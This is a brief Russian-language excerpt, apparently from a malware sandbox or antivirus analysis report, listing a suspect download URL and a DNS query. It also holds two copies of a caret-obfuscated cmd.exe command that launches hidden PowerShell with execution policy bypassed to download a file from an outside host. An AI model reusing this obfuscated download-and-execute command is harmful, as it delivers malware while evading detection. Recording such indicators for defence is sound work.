Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^OWE^r^SHe^lL.ExE^ ^-ex^eC^u^TIO^NPo^L^iCY B^yp^aSs -NoPro^Fi^Le ^-winDo^W^s^TylE^ hIdd^EN (^N^eW-obJE^Ct^ SYs^TEm^.Ne^T.wE^bcli^en^t)^.^D^oWnLO^a^dfil^E^(^'http://newfoodas.top/rea...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "p^OWE^r^SHe^lL.ExE^ ^-ex^eC^u^TIO^NPo^L^iCY B^yp^aSs -NoPro^Fi^Le ^-winDo^W^s^TylE^ hIdd^EN (^N^eW-obJE^Ct^ SYs^TEm^.Ne^T.wE^bcli^en^t)^.^D^oWnLO^a^dfil^E^(^'http://newfoodas.top/rea...' (со скрытым окном)